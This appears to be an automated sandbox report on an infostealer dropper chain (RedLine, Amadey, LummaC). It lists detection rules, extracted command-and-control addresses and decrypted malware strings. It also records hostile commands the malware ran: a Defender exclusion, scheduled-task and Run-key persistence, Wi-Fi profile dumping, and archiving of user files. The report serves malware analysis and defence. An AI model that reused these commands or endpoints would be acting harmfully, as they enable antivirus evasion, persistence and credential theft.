10.2.alexxxxxxxx.exe.3b05570.3.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
10.2.alexxxxxxxx.exe.3b05570.3.unpack	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0xaae33:$a1: get_encrypted_key 0x182675:$a1: get_encrypted_key 0x181d77:$a2: get_PassedPaths 0xa6f1a:$a3: ChromeGetLocalName 0x180798:$a3: ChromeGetLocalName 0x20b0b:$a4: GetBrowsers 0xa9e88:$a4: GetBrowsers 0x181f78:$a4: GetBrowsers 0xb51e2:$a5: Software\Valve\SteamLogin Data 0x1889a2:$a5: Software\Valve\SteamLogin Data 0xb39e2:$a6: %appdata%\ 0x188242:$a6: %appdata%\ 0x181a9c:$a7: ScanPasswords
10.2.alexxxxxxxx.exe.3b05570.3.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xb61fa:$pat14: , CommandLine: 0x188c12:$pat14: , CommandLine: 0x20b72:$v2_1: ListOfProcesses 0x181c48:$v2_1: ListOfProcesses 0xa95aa:$v4_3: base64str 0x181a08:$v4_3: base64str 0x1f930:$v4_4: stringKey 0xaadd4:$v4_4: stringKey 0x182643:$v4_4: stringKey 0xa648a:$v4_5: BytesToStringConverted 0x1801ad:$v4_5: BytesToStringConverted 0xa46d4:$v4_6: FromBase64 0x17f2a8:$v4_6: FromBase64 0x180720:$v4_8: procName 0xa73cd:$v5_1: DownloadAndExecuteUpdate 0x180a36:$v5_1: DownloadAndExecuteUpdate 0x1818df:$v5_2: ITaskProcessor 0x180a24:$v5_3: CommandLineUpdate 0xa73be:$v5_4: DownloadUpdate 0x180a15:$v5_4: DownloadUpdate 0xa7cf5:$v5_5: FileScanning
15.2.Traffic.exe.125f1a78.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Click to see the 25 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1001084001\random.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe, ProcessId: 1468, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\random.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe, ParentProcessId: 7496, ParentProcessName: FirstZ.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7780, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 6424, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 4904, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1001084001\random.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe, ProcessId: 1468, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\random.exe

Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems), frack113: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 6424, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 4904, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe, ParentProcessId: 1776, ParentProcessName: NewB.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe" /F, ProcessId: 5564, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 6424, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 4904, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5920, ProcessName: svchost.exe

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: netsh wlan show profiles, CommandLine: netsh wlan show profiles, CommandLine|base64offset|contains: l, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 6424, ParentProcessName: rundll32.exe, ProcessCommandLine: netsh wlan show profiles, ProcessId: 6656, ProcessName: netsh.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: bUWKfj04aU.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\A47mXAfrsBDpojX2UlRMyVjb.exe	Avira: detection malicious, Label: HEUR/AGEN.1310451
Source: C:\Users\user\AppData\Local\HwwnZ3CpAQLjyKlmGEjpSgAe.exe	Avira: detection malicious, Label: HEUR/AGEN.1310451
Source: C:\Users\user\AppData\Local\KS0KCSisDq7pEmahBFThP4AT.exe	Avira: detection malicious, Label: HEUR/AGEN.1310451
Source: C:\Users\user\AppData\Local\1YUCcdc2ns8K2t45poUN7Amx.exe	Avira: detection malicious, Label: TR/Crypt.EPACK.Gen2
Source: C:\Users\user\AppData\Local\2pxZ3QGs5RsdEF32wezepFbS.exe	Avira: detection malicious, Label: TR/Crypt.EPACK.Gen2
Source: C:\Users\user\AppData\Local\9xT7E5Pb81hXRamadrxhTcKa.exe	Avira: detection malicious, Label: TR/Crypt.EPACK.Gen2
Source: C:\Users\user\AppData\Local\2dRkzCtGWj8VKkanaZyDrBYJ.exe	Avira: detection malicious, Label: TR/Crypt.EPACK.Gen2
Source: C:\Users\user\AppData\Local\MSGhyVQl8QvU645EqnDaDG5h.exe	Avira: detection malicious, Label: TR/Crypt.EPACK.Gen2
Source: C:\Users\user\AppData\Local\3u6RrNmizX68IHHLss9QqKUE.exe	Avira: detection malicious, Label: TR/Crypt.EPACK.Gen2
Source: C:\Users\user\AppData\Local\JgoflcD9Q8N9LvT5krhponwA.exe	Avira: detection malicious, Label: HEUR/AGEN.1310451
Source: C:\Users\user\AppData\Local\6kv625NXRIyPYKeDaoPyctw3.exe	Avira: detection malicious, Label: HEUR/AGEN.1310451
Source: C:\Users\user\AppData\Local\0Tp94y9MBurxJFhItxZ95EWw.exe	Avira: detection malicious, Label: TR/Crypt.EPACK.Gen2
Source: C:\Users\user\AppData\Local\GbMT76fl6mAPfbFsS3x29QL1.exe	Avira: detection malicious, Label: TR/Crypt.EPACK.Gen2

Found malware configuration

Source: 0000000A.00000002.2271671273.0000000003B73000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: RedLine {"C2 url": "185.172.128.33:8970", "Bot Id": "@OLEH_PSP", "Authorization Header": "5fbb2db54ba05b2223e91d7545647809"}
Source: 26.0.NewB.exe.190000.0.unpack	Malware Configuration Extractor: Amadey {"C2 url": "185.172.128.19/ghsdh39s/index.php", "Version": "4.12"}
Source: RegAsm.exe.1424.21.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": ["wifeplasterbakewis.shop", "mealplayerpreceodsju.shop", "bordersoarmanusjuw.shop", "suitcaseacanehalk.shop", "absentconvicsjawun.shop", "pushjellysingeywus.shop", "economicscreateojsu.shop", "entitlementappwo.shop"], "Build id": "LOGS11--LiveTraffic"}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\wikombernizc\reakuqnanrkn.exe	ReversingLabs: Detection: 95%
Source: C:\ProgramData\wikombernizc\reakuqnanrkn.exe	Virustotal: Detection: 82%	Perma Link
Source: C:\Users\user\AppData\Local\0Tp94y9MBurxJFhItxZ95EWw.exe	Virustotal: Detection: 45%	Perma Link
Source: C:\Users\user\AppData\Local\1YUCcdc2ns8K2t45poUN7Amx.exe	Virustotal: Detection: 45%	Perma Link
Source: C:\Users\user\AppData\Local\2dRkzCtGWj8VKkanaZyDrBYJ.exe	Virustotal: Detection: 45%	Perma Link
Source: C:\Users\user\AppData\Local\2pxZ3QGs5RsdEF32wezepFbS.exe	Virustotal: Detection: 45%	Perma Link
Source: C:\Users\user\AppData\Local\3u6RrNmizX68IHHLss9QqKUE.exe	Virustotal: Detection: 45%	Perma Link
Source: C:\Users\user\AppData\Local\6kv625NXRIyPYKeDaoPyctw3.exe	Virustotal: Detection: 44%	Perma Link
Source: C:\Users\user\AppData\Local\9xT7E5Pb81hXRamadrxhTcKa.exe	Virustotal: Detection: 45%	Perma Link
Source: C:\Users\user\AppData\Local\A47mXAfrsBDpojX2UlRMyVjb.exe	Virustotal: Detection: 44%	Perma Link
Source: C:\Users\user\AppData\Local\BD2oseXp7BCvMSmO4ZjO5L8H.exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\BD2oseXp7BCvMSmO4ZjO5L8H.exe	Virustotal: Detection: 34%	Perma Link
Source: C:\Users\user\AppData\Local\EbkuLW0CG2HYrP9ej87UFUE5.exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\EbkuLW0CG2HYrP9ej87UFUE5.exe	Virustotal: Detection: 34%	Perma Link
Source: C:\Users\user\AppData\Local\EobcTZAHsg9TkKb6ZiDxOQpo.exe	ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Local\EobcTZAHsg9TkKb6ZiDxOQpo.exe	Virustotal: Detection: 60%	Perma Link
Source: C:\Users\user\AppData\Local\GbMT76fl6mAPfbFsS3x29QL1.exe	Virustotal: Detection: 45%	Perma Link
Source: C:\Users\user\AppData\Local\HwwnZ3CpAQLjyKlmGEjpSgAe.exe	Virustotal: Detection: 44%	Perma Link

Multi AV Scanner detection for submitted file

Source: bUWKfj04aU.exe	ReversingLabs: Detection: 63%
Source: bUWKfj04aU.exe	Virustotal: Detection: 65%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\A47mXAfrsBDpojX2UlRMyVjb.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\HwwnZ3CpAQLjyKlmGEjpSgAe.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\KS0KCSisDq7pEmahBFThP4AT.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\1YUCcdc2ns8K2t45poUN7Amx.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\2pxZ3QGs5RsdEF32wezepFbS.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\9xT7E5Pb81hXRamadrxhTcKa.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\2dRkzCtGWj8VKkanaZyDrBYJ.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\MSGhyVQl8QvU645EqnDaDG5h.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\EbkuLW0CG2HYrP9ej87UFUE5.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\3u6RrNmizX68IHHLss9QqKUE.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\JgoflcD9Q8N9LvT5krhponwA.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\6kv625NXRIyPYKeDaoPyctw3.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\0Tp94y9MBurxJFhItxZ95EWw.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\GbMT76fl6mAPfbFsS3x29QL1.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\BD2oseXp7BCvMSmO4ZjO5L8H.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: bUWKfj04aU.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: pillowbrocccolipe.shop
Source: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: communicationgenerwo.shop
Source: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: diskretainvigorousiw.shop
Source: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: affordcharmcropwo.shop
Source: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: dismissalcylinderhostw.shop
Source: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: enthusiasimtitleow.shop
Source: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: worryfillvolcawoi.shop
Source: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: cleartotalfisherwo.shop
Source: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: affordcharmcropwo.shop
Source: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: LGNDR1--ketamine
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: 185.172.128.19
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: /ghsdh39s/index.php
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: S-%lu-
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: cd1f156d67
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: Utsysc.exe
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: SCHTASKS
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: /Create /SC MINUTE /MO 1 /TN
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: /TR "
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: Startup
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: cmd /C RMDIR /s/q
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: rundll32
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: /Delete /TN "
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: Programs
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: %USERPROFILE%
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: cred.dll\|clip.dll\|
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: http://
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: https://
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: /Plugins/
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: &unit=
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: shell32.dll
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: kernel32.dll
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: GetNativeSystemInfo
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: ProgramData\
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: AVAST Software
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: Kaspersky Lab
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: Panda Security
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: Doctor Web
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: 360TotalSecurity
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: Bitdefender
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: Norton
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: Sophos
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: Comodo
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: WinDefender
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: 0123456789
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: ------
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: ?scr=1
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: ComputerName
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: -unicode-
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: VideoID
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: DefaultSettings.XResolution
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: DefaultSettings.YResolution
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: ProductName
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: CurrentBuild
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: echo Y\|CACLS "
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: " /P "
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: CACLS "
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: :R" /E
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: :F" /E
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: &&Exit
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: rundll32.exe
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: "taskkill /f /im "
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: " && timeout 1 && del
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: && Exit"
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: " && ren
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: Powershell.exe
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: -executionpolicy remotesigned -File "
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: shutdown -s -t 0
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: /w']fC
Source: 26.0.NewB.exe.190000.0.unpack	String decryptor: vw(hF=

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00415B57 CryptUnprotectData,		21_2_00415B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_004162C7 CryptUnprotectData,		29_2_004162C7

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 00000028.00000002.3022619723.0000025500041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.3456932485.0000027AB9251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file300un.exe PID: 7672, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Uni400uni.exe PID: 7684, type: MEMORYSTR

Source: bUWKfj04aU.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\1000187001\4767d2e713f2021e8fe856e3ea638b58.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source:	Binary string: C:\paz\81\soseleyayaj\kud.pdb source: ISetup8.exe, 00000023.00000003.2889135896.0000000004A61000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\pilace\bemelejedar-xuyu.pdb source: 4767d2e713f2021e8fe856e3ea638b58.exe, 00000021.00000000.2365060303.000000000041C000.00000002.00000001.01000000.0000001A.sdmp, fNXuIJPtZ25Cf8AC2M7nLhvu.exe.51.dr, aCC9Y3uZiPILOE7CPQBm3dqe.exe.51.dr
Source:	Binary string: C:\hisi.pdb source: ISetup8.exe, 00000023.00000000.2398337251.000000000041C000.00000002.00000001.01000000.0000001C.sdmp, ISetup8.exe, 00000023.00000003.3016845539.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, A47mXAfrsBDpojX2UlRMyVjb.exe.45.dr
Source:	Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer.exe.pdb source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr
Source:	Binary string: 2C:\pilace\bemelejedar-xuyu.pdb source: 4767d2e713f2021e8fe856e3ea638b58.exe, 00000021.00000000.2365060303.000000000041C000.00000002.00000001.01000000.0000001A.sdmp, fNXuIJPtZ25Cf8AC2M7nLhvu.exe.51.dr, aCC9Y3uZiPILOE7CPQBm3dqe.exe.51.dr
Source:	Binary string: `C:\paz\81\soseleyayaj\kud.pdb source: ISetup8.exe, 00000023.00000003.2889135896.0000000004A61000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\tx2yxmt09kx\obj\Release\Croco.pdbt source: swiiiii.exe, 0000001B.00000002.2620190286.0000000002853000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Anton\Desktop\UnionFiles\UnionFiles\obj\Debug\union.pdb source: alexxxxxxxx.exe, 0000000A.00000002.2271671273.0000000003B73000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\tx2yxmt09kx\obj\Release\Croco.pdb source: swiiiii.exe, 0000001B.00000002.2620190286.0000000002853000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Anton\Desktop\UnionFiles\UnionFiles\obj\Debug\union.pdb) source: alexxxxxxxx.exe, 0000000A.00000002.2271671273.0000000003B73000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer.exe.pdb@ source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr
Source:	Binary string: C:\hisi.pdb source: ISetup8.exe, 00000023.00000000.2398337251.000000000041C000.00000002.00000001.01000000.0000001C.sdmp, ISetup8.exe, 00000023.00000003.3016845539.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, A47mXAfrsBDpojX2UlRMyVjb.exe.45.dr
Source:	Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer_lib.dll.pdb source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr

Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe

Code function: 26_2_001CDB5E FindFirstFileExW,

26_2_001CDB5E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+70h]	21_2_00417239
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esp+00000080h]	21_2_004212B0
